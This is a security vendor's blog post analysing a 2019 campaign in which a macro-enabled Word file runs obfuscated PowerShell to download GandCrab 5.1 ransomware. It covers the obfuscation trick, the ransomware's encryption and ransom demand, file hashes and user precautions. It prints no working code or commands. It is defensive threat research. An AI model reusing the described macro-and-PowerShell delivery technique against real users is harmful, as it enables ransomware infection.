• News
  • Security
  • Products
  • About Seqrite
Seqrite Blog Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  Ransomware • Security  /  GandCrab Riding Emotet’s Bus!
15 February 2019

GandCrab Riding Emotet’s Bus!

Written by Bajrang Mane
Bajrang Mane
Ransomware, Security
  • 10
    Shares
Estimated reading time: 4 minutes

Emotet Known for constantly changing its payload and infection vectors like spam mail, Malicious Doc and even Malicious JS files. It compromised a very high number of websites on the internet. Emotet malware campaign has existed since 2014. It comes frequently in intervals with different techniques and variants to deliver malware on a victim’s machine. Most of the websites are genuine but somehow tricked into delivering Emotet. But this time, some of these websites were seen delivering GandCrab Ransomware V 5.1 for some time.

The payload was downloaded through a malicious doc on the victim’s computer using VBA macro. The PowerShell script from macro connected to the compromised website and downloaded GandCrab Ransomware from the URL. It is observed that the same website was used in other malicious campaigns and served different purposes over time.

Infection Vector:

Fig. 1 Attack Chain

Technical Analysis:

The Microsoft Office Doc file was named ‘Urgent notice.doc’ and had only text ‘Urgent notice’.

Fig. 2 Document File

After opening the file, it asks to enable macros to perform downloading tasks.

Macro:

The Malicious Macro contained 3 modules and one form. Form named ‘f’ contains the obfuscated PowerShell data and 3 modules having random names like cBbOFw, BJXTRQZOY, lC0gFL58m contain code to execute de-obfuscated PowerShell script.

Fig. 3 Modules and Form

Form:

Fig. 4 Obfuscated Macro

This can be de-obfuscated by simply replacing ‘5820.5840869546’ with null (i.e. removing ‘5820.5840869546’ from the string)

Output:

Fig. 5 De-obfuscated Macro

This output is prepended by the first three characters ‘P’, ’o’ and ‘w’ using variables at the start of it. Hence, this forms initial word PowerShell then used by function love () and is executed to download and launch the payload.

Fig. 6 PowerShell Execution

After execution of this PowerShell script, putty.exe which is the GandCrab payload was downloaded to ‘C: \Windows\Temp’ directory of victim’s machine and same was executed.

 GandCrab Payload:

On execution, it encrypted all files and showed the GandCrab wallpaper. From ransom note, it is clear that the payload was of GandCrab V 5.1 ransomware.

Fig. 7 Ransom Note

GandCrab finds AV processes on victim’s computer, also it tries to kill other running processes like SQL database servers to ensure encryption of important files. GandCrab then encrypts all files with Salsa20 Encryption Algorithm and this Salsa20 key is encrypted with RSA-2048 and appended to file after data. It is not feasible to decrypt the data without the private key. It is observed that it collects all data related to the user like username, computer name, workgroup, IP address. This data is encrypted with the RC4 encryption algorithm and sends to the C&C server.

The GandCrab v5 ransomware has started using Task Scheduler ALPC vulnerability to gain System privileges on an infected computer.

After encryption, it asks for $700 in dash/bitcoin cryptocurrency; also 10% charges are applicable for miner fees/commission. In the past, if the victim could not pay the full ransom amount, he/she was offered some discount to decrypt the files.

Fig. 8 GandCrab Ransom Page

It is observed that in the end, GandCrab tries to connect with the number of compromised domains having a particular URL formation algorithm as discussed previously. This behavior shows a similarity with Emotet campaign.

After a few hours, the same domain started serving pornographic phishing content.

Indicator of Compromise:

Doc File (Urgent notice.doc): 64F3F3CC1E121B295DA1FF74CC180473

Exe File (Putty.exe): 5B1B6AF59E29D9A2AA120277CAB14D0C

Precautions:

  • Do not open emails from unknown sources.
  • Do not download attachments received from an untrusted source.
  • Validate sender’s email id before clicking URLs mentioned in the mail.
  • Do not enable macros/editing mode by default.

We recommend our users to apply the latest Microsoft update packages and keep their antivirus up-to-date with active email protection.

 Subject Matter Experts

Jayesh Kulkarni, Amit Gadhave | Quick Heal Security Labs

 Previous PostIncrease in threats to mobile devices
Next Post  How are social networking accounts used for malicious purposes?
Bajrang Mane
About Bajrang Mane

Bajrang Mane is leading the Threat Analysis, Incident response, and Automation teams in Quick Heal Security Labs. Having spent 13 years in the IT security industry,...

Articles by Bajrang Mane »

Related Posts

  • Zloader: Entailing Different Office Files

    March 23, 2021
  • BEC and Ransomware attacks unsettle businesses globally.

    BEC and Ransomware attacks increase during the pandemic

    January 22, 2021
  • Thanos Ransomware adopts hyper-weaponized RIPlace tactics — collects huge pay-offs.

    Thanos Ransomware Evading Anti-ransomware Protection With RIPlace Tactic

    November 18, 2020

No Comments

Leave a Reply.Your email address will not be published.

Cancel reply

CAPTCHA Image
Refresh Image

Popular Posts

  • New Spear Phishing Campaign using Army Welfare Education Society’s Scholarship form New Spear Phishing Campaign using Army Welfare Education Society’s Scholarship form March 22, 2021
  • 5 Security measures you should take to protect your organization’s network 5 Security measures you should take to protect your organization’s network August 11, 2017
  • Nation-states shoot from somebody else’s shoulder Nation-states shoot from somebody else’s shoulder March 10, 2021

Featured Authors

  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Viraj Talikotkar
    Viraj Talikotkar

    Viraj is a Lead Technical Writer at Quick Heal Technologies. He is always on...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director and Chief Technology Officer of...

    Read more..

Latest Posts

  • How to avoid dual attack and vulnerable files with double extension?

    How to avoid dual attack and vulnerable files with double extension?

    April 9, 2021
  • Cryptocurrency Malware: Bitcoin Mining threats you need to know about

    Cryptocurrency Malware: Bitcoin Mining threats you need to know about

    April 4, 2021
  • Zloader: Entailing Different Office Files

    Zloader: Entailing Different Office Files

    March 23, 2021

Stay Updated!

Topics

Antivirus For Linux (10) apt (10) Bitcoin (9) BYOD (9) COVID-19 (10) Cyber-attack (31) cyber-attacks (56) cyberattacks (12) Cybersecurity (284) cyber security (26) Cyber threat (29) cyber threats (44) Data (11) data breach (50) data breaches (27) data loss (28) data loss prevention (33) data protection (21) data security (13) DLP (49) Encryption (16) endpoint security (103) Enterprise security (14) EPS (9) Exploit (12) firewall (11) GDPR (10) IoT (10) malware (59) malware attack (23) malware attacks (12) MDM (25) Network security (18) Patch Management (12) phishing (17) Ransomware (56) ransomware attack (29) ransomware attacks (30) ransomware protection (12) Seqrite (24) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) UTM (34) Vulnerability (10)

Products

  • Endpoint Security (EPS)
  • Seqrite Encryption Manager
  • Seqrite Endpoint Security Cloud
  • Cloud Security
  • Seqrite mSuite
  • Seqrite Workspace
  • Unified Threat Management
  • Antivirus for Server
  • Antivirus for Linux

Resources

  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies

About Us

  • Company Overview
  • Leadership
  • Why choose SEQRITE?
  • Awards & Certifications
  • Newsroom

Archives

  • By Date
  • By Category

© 2020 Quick Heal Technologies Ltd. (Formerly Known as Quick Heal Technologies Pvt. Ltd.) Cookie Policies Privacy Policies

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website.
By browsing this website, you agree to our cookie policy.